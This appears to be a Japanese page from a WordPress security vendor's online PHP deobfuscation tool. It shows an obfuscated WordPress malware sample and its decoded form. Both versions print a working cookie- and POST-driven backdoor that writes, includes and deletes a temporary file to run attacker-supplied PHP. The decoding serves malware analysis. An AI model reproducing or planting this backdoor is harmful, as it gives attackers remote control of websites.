Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php function b1($r2){$y3 = "4(L@;v5 lag8/2yp'.sFr*7" ."<0hx6mei-uEIH)b#t?_" ."dc9kno3f" ;$h5='';foreach($r2 as $s4){$h5.=$y3[$s4];}return $h5;}$u6 = Array();$u6[] = b1(Array(43,37,13,0,9,49,22,42,31,44,27,43,44,31,0,49,37,48,31,37,37,22,24,31,13,24,49,9,44,9,6,49,9,43,11,24));$u6[] = b1(Arra...



難読化されたPHPコード

<?php function b1($r2){$y3 = "4(L@;v5 lag8/2yp'.sFr*7" ."<0hx6mei-uEIH)b#t?_" ."dc9kno3f" ;$h5='';foreach($r2 as $s4){$h5.=$y3[$s4];}return $h5;}$u6 = Array();$u6[] = b1(Array(43,37,13,0,9,49,22,42,31,44,27,43,44,31,0,49,37,48,31,37,37,22,24,31,13,24,49,9,44,9,6,49,9,43,11,24));$u6[] = b1(Array(40,15,25,15,7,3,32,46,8,30,46,45,1,41,41,19,34,2,33,41,41,36,4,7));$u6[] = b1(Array(17,28,47,42,32,8,29));$u6[] = b1(Array(35,21));$u6[] = b1(Array(17,12));$u6[] = b1(Array(38));$u6[] = b1(Array(23));$u6[] = b1(Array(49,30,8,29,41,15,32,39,41,43,47,46,39,29,46,39,18));$u6[] = b1(Array(9,20,20,9,14,41,28,29,20,10,29));$u6[] = b1(Array(18,39,20,41,20,29,15,29,9,39));$u6[] = b1(Array(29,26,15,8,47,42,29));$u6[] = b1(Array(18,32,37,18,39,20));$u6[] = b1(Array(32,46,8,30,46,45));$u6[] = b1(Array(18,39,20,8,29,46));$u6[] = b1(Array(15,9,43,45));$u6[] = b1(Array(28,42,6));foreach ($u6[8]($_COOKIE, $_POST) as $s14 => $v11){function o8($u6, $s14, $n10){return $u6[11]($u6[9]($s14 . $u6[0], ($n10 / $u6[13]($s14)) + 1), 0, $n10);}function g7($u6, $q12){return @$u6[14]($u6[3], $q12);}function w9($u6, $q12){if (isset($q12[2])) {$b13 = $u6[4] . $u6[15]($u6[0]) . $u6[2];@$u6[7]($b13, $u6[6] . $u6[1] . $q12[1]($q12[2]));@include($b13);@$u6[12]($b13);exit();}}$v11 = g7($u6, $v11);w9($u6, $u6[10]($u6[5], $v11 ^ o8($u6, $s14, $u6[13]($v11))));}

デコード(難読化解除)されたコード

<?php

function b1($r2)
{
    $y3 = "4(L@;v5 lag8/2yp'.sFr*7<0hx6mei-uEIH)b#t?_dc9kno3f";
    $h5 = '';
    foreach ($r2 as $s4) {
        $h5 .= $y3[$s4];
    }
    return $h5;
}
$u6 = array();
$u6[] = b1(array(43, 37, 13, 0, 9, 49, 22, 42, 31, 44, 27, 43, 44, 31, 0, 49, 37, 48, 31, 37, 37, 22, 24, 31, 13, 24, 49, 9, 44, 9, 6, 49, 9, 43, 11, 24));
$u6[] = b1(array(40, 15, 25, 15, 7, 3, 32, 46, 8, 30, 46, 45, 1, 41, 41, 19, 34, 2, 33, 41, 41, 36, 4, 7));
$u6[] = b1(array(17, 28, 47, 42, 32, 8, 29));
$u6[] = b1(array(35, 21));
$u6[] = b1(array(17, 12));
$u6[] = b1(array(38));
$u6[] = b1(array(23));
$u6[] = b1(array(49, 30, 8, 29, 41, 15, 32, 39, 41, 43, 47, 46, 39, 29, 46, 39, 18));
$u6[] = b1(array(9, 20, 20, 9, 14, 41, 28, 29, 20, 10, 29));
$u6[] = b1(array(18, 39, 20, 41, 20, 29, 15, 29, 9, 39));
$u6[] = b1(array(29, 26, 15, 8, 47, 42, 29));
$u6[] = b1(array(18, 32, 37, 18, 39, 20));
$u6[] = b1(array(32, 46, 8, 30, 46, 45));
$u6[] = b1(array(18, 39, 20, 8, 29, 46));
$u6[] = b1(array(15, 9, 43, 45));
$u6[] = b1(array(28, 42, 6));
foreach ($u6[8]($_COOKIE, $_POST) as $s14 => $v11) {
    function o8($u6, $s14, $n10)
    {
        return $u6[11]($u6[9]($s14 . $u6[0], $n10 / $u6[13]($s14) + 1), 0, $n10);
    }
    function g7($u6, $q12)
    {
        return @$u6[14]($u6[3], $q12);
    }
    function w9($u6, $q12)
    {
        if (isset($q12[2])) {
            $b13 = $u6[4] . $u6[15]($u6[0]) . $u6[2];
            @$u6[7]($b13, $u6[6] . $u6[1] . $q12[1]($q12[2]));
            @(include $b13);
            @$u6[12]($b13);
            exit;
        }
    }
    $v11 = g7($u6, $v11);
    w9($u6, $u6[10]($u6[5], $v11 ^ o8($u6, $s14, $u6[13]($v11))));
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.